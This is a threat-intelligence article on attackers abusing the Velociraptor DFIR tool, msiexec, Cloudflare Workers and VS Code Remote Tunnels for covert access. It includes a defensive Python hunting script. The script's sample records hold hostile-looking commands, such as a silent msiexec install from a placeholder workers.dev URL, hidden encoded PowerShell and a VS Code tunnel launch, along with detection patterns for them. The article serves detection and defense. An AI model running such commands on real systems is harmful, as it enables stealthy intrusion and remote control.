Sophos Counter Threat Unit has observed a campaign where attackers weaponized the open‑source digital forensics and incident response (DFIR) tool Velociraptor as part of a living‑off‑the‑land (LotL) intrusion. The operation chained multiple legitimate components—Windows msiexec, Cloudflare Workers, and Visual Studio Code remote tunneling—to establish stealthy remote access and enable remote code execution without deploying noisy malware.
Attack chain: msiexec staging, Cloudflare infrastructure, and VS Code Tunnels
According to Sophos, the intrusion began with msiexec retrieving an MSI from a Cloudflare Workers domain, used as an intermediary staging layer. The installer deployed Velociraptor, which then beaconed to a second domain within the same Cloudflare ecosystem. Using signed binaries and reputable cloud services helped the operators blend into normal traffic patterns.
After initial control was established, the adversaries used an encoded PowerShell command to download Visual Studio Code from the same staging node and launched it with Remote Tunnels enabled. This configuration provided inbound remote access without traditional port exposure, effectively bypassing many perimeter controls. Sophos also found signs of Cloudflare tunneling and the use of the legitimate remote administration utility Radmin. In several cases, msiexec was reused to fetch additional payloads.
From RMM to DFIR: LotL tactics continue to evolve
The abuse of Velociraptor highlights a shift in LotL tradecraft. Whereas attackers commonly misuse remote monitoring and management (RMM) tools, they are increasingly co‑opting DFIR utilities that defenders often trust by default. This complicates detection and response, as DFIR tooling can appear benign in telemetry and allowlists.
The technique maps to MITRE ATT&CK, notably Signed Binary Proxy Execution: Msiexec (T1218.007), and aligns with the use of application layers and tunnels to circumvent network egress restrictions (related to ATT&CK categories for tunneling and proxies). Sophos cautions that unsanctioned Velociraptor deployments should be treated as a potential precursor to ransomware and other post‑exploitation activities.
Risks and observable indicators in enterprise environments
Key risks include silent perimeter bypass, persistent remote access, and privilege escalation without deploying conventional backdoors. Defenders should watch for blended behaviors across signed binaries, cloud infrastructure, and encoded scripting.
Indicators and investigative leads
Security teams should investigate:
- Unusual msiexec network connections to Cloudflare Workers or unfamiliar domains.
- Unexpected installation, service activity, or configuration changes associated with Velociraptor.
- VS Code launched with parameters enabling Remote Tunnels or similar inbound proxying.
- PowerShell executions using EncodedCommand in proximity to msiexec, Velociraptor, or VS Code processes.
- Outbound connections to tunneling services and remote admin tools (e.g., Cloudflare Tunnel, Radmin) outside approved baselines.
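As an added illustration (not code from Sophos or Rapid7), the Python below hunts for the indicators listed above over constructed Sysmon-style process-creation records; the hostnames, file paths, the base64 payload, the sanctioned Velociraptor install directory (APPROVED_DIR) and the 10-minute proximity window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation records; hostnames, paths and the base64 are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ts": "2025-08-01T10:00:00", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "msiexec.exe /i https://placeholder-worker.workers.dev/velociraptor.msi /qn"},
    {"ts": "2025-08-01T10:01:30", "image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "Velociraptor.exe --config client.config.yaml client"},
    {"ts": "2025-08-01T10:02:10", "image": PS,
     "parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand QUFBQQ=="},
    {"ts": "2025-08-01T10:05:00", "image": r"C:\Users\Public\code\code.exe",
     "parent": PS, "cmdline": "code.exe tunnel --accept-server-license-terms"},
    {"ts": "2025-08-01T11:00:00", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi /qn"},
]

LOTL_TOOLS = re.compile(r"(msiexec|velociraptor|code)\.exe$", re.I)
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)
REMOTE_MSI = re.compile(r"\bhttps?://\S+\.msi\b", re.I)
VSCODE_TUNNEL = re.compile(r'code(\.exe)?"?\s+tunnel\b', re.I)
APPROVED_DIR = r"c:\program files\corpdfir"   # assumed sanctioned Velociraptor install path
WINDOW = timedelta(minutes=10)                 # assumed proximity window for encoded PowerShell

def flag_events(events):
    """Return (timestamp, rule) pairs for records matching the indicators above."""
    lotl_times = [datetime.fromisoformat(e["ts"]) for e in events
                  if LOTL_TOOLS.search(e["image"])]
    findings = []
    for e in events:
        name, cmd, ts = e["image"].rsplit("\\", 1)[-1].lower(), e["cmdline"], datetime.fromisoformat(e["ts"])
        if name == "msiexec.exe" and REMOTE_MSI.search(cmd):
            # MSI fetched over HTTP(S); Cloudflare Workers hosts live under workers.dev
            sev = "high" if ".workers.dev/" in cmd.lower() else "medium"
            findings.append((e["ts"], f"msiexec-remote-msi:{sev}"))
        elif name == "velociraptor.exe" and not e["image"].lower().startswith(APPROVED_DIR + "\\"):
            findings.append((e["ts"], "velociraptor-outside-approved-path"))
        elif name == "code.exe" and VSCODE_TUNNEL.search(cmd):
            findings.append((e["ts"], "vscode-remote-tunnel"))
        elif name == "powershell.exe" and ENCODED_PS.search(cmd):
            # Encoded PowerShell spawned by, or within WINDOW of, msiexec/Velociraptor/VS Code
            if LOTL_TOOLS.search(e["parent"]) or any(abs(ts - t) <= WINDOW for t in lotl_times):
                findings.append((e["ts"], "encoded-ps-near-lotl-tools"))
    return findings
```

Run against real telemetry, the local 7-Zip install and encoded PowerShell with no nearby msiexec/Velociraptor/VS Code activity produce no finding, which keeps the rule set usable as a triage filter rather than a noisy alert.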
Industry guidance and recommended defenses
Regulators and ISACs, including CISA, have repeatedly warned about the rise in abuse of legitimate RMM/administrative tools and have published hardening advice for their safe use. In parallel with Sophos’s publication, Rapid7—the maintainer of Velociraptor—issued detection and containment guidance for organizations, noting that any security tool can be misused when controls are weak.
Practical mitigations include:
- Access control and allowlisting: Restrict who can install and run DFIR/RMM tools; enforce application allowlisting for installers and signed binaries.
- Package integrity and provenance: Validate MSI sources and signatures; block installer execution from untrusted cloud endpoints.
- Process and script auditing: Monitor msiexec and PowerShell with full logging; review process trees and command‑line arguments; enable PowerShell Script Block Logging.
- Egress governance: Limit and monitor outbound traffic to tunneling and proxy services; apply DNS and TLS inspection where policy allows.
- Velociraptor detections: Alert on clients reporting to unknown control servers, atypical configurations, or deviations from the organization's standard deployment profile.
The incident underscores a broader lesson: legitimate tools do not equal trusted activity. Revisit policies for DFIR and RMM usage, tighten egress controls, and ensure enhanced logging for installers and PowerShell. Early detection of LotL patterns can materially reduce the likelihood of lateral movement and ransomware deployment.